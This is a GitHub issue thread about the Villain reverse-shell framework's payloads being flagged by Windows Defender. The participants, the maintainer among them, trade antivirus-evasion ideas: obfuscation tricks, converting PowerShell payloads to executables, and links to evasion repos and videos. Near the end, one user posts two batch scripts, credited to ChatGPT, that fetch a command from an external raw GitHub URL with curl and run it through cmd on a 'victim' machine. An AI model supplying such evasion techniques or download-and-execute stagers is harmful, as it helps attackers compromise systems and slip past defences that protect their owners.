Villain gets detected by windows defender about villain HOT 26 CLOSED

I made a small update in the payload templates and it seems to do the trick again (for now).
You should not expect this to last forever (by this or any other tool), the obfuscate function is there to assist you, not to do the job for you.

I will try to update the templates and improve the general functionality of Villain in time but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques both manually and by using automated tools, you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.

from villain.

I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs

from villain.

I am intentionally leaving this open indefinitely.

from villain.

Thank you for response. Your tool is very useful and great work!

from villain.

@rikda It will eventually get detected, you need to apply your own magic to bypass.

from villain.

@t3l3machus Thx for your work ! Your code make me happy ton explain somes risk to my students :=)

from villain.

Using obfuscate option getting detected

from villain.

same issus

from villain.

@t3l3machus unfortunately with new windows defender update same issue again

from villain.

You might "cypher" de string unsing key ?

from villain.

@edikiuspy thank you :))

from villain.

@t3l3machus Nicely done for your explain.
Maybe you can use :

in your can obfuscate it by changing variable names.
Add OR AND conditions automaticly ? :)
The goal here is to not touch the payload generated ;)

from villain.

@gaalos That was the goal at the beginning. It doesn't matter how complicated i make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there, it doesn't work).

from villain.

@t3l3machus yes it's true ^^.
Maybe create payload without powershell as binary file ?

from villain.

@gaalos yeah i have already done it! I will update soon with an additional windows cmd payload template

from villain.

detected by AV

from villain.

if you want to bypass defender please try these techniques

https://youtu.be/EZOW40S_cTM

from villain.

@t3l3machus when did you do the update about "

Maybe create payload without powershell as binary file ?

Hey @t3l3machus when did you update it with binary payload ? :p

from villain.

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

from villain.

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

For me its still working like a charm ,but im wondring if there's a way to fix the payload to be able to work on OS Windows 8.1 ,it giving me this

from villain.

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

from villain.

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Thank you for your replay, but unfortunately converting ps to exe doesn't help to get the reverse shell working
it works on widows 10 - 11 - server 2018 , but not ( Windows 8.1 )

from villain.

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

not working because it's just executing script, not a real BINARY/EXE File :)

from villain.

Does someone have the older version of villain? if yes can you guys send the file here pls

from villain.

The last version of Villain still gets detected by windows defender. The obfustacte function doesn't work for the netcat templates, i got this error "Ignoring unsupported arguments: OBFUSCATE" and add the obfuscate attrinut doesn't work either. Does someone how i can make this work ?

from villain.

Hey all i use something like curl to ... and it's work
Thx to chatGPT

run.bat
`
@echo off

REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande
cmd /k %curl_output%

REM Terminer le script
exit
`

or
`
@echo off

REM Remplacez l'URL par celle que vous souhaitez appeler
set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable
for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande
start /B cmd /k %curl_output%

REM Terminer le script
exit `

@t3l3machus Maybe you can try to create cmd/powreshell base on curl call ?
Obviously the "victim" need to get grant access to the external url

from villain.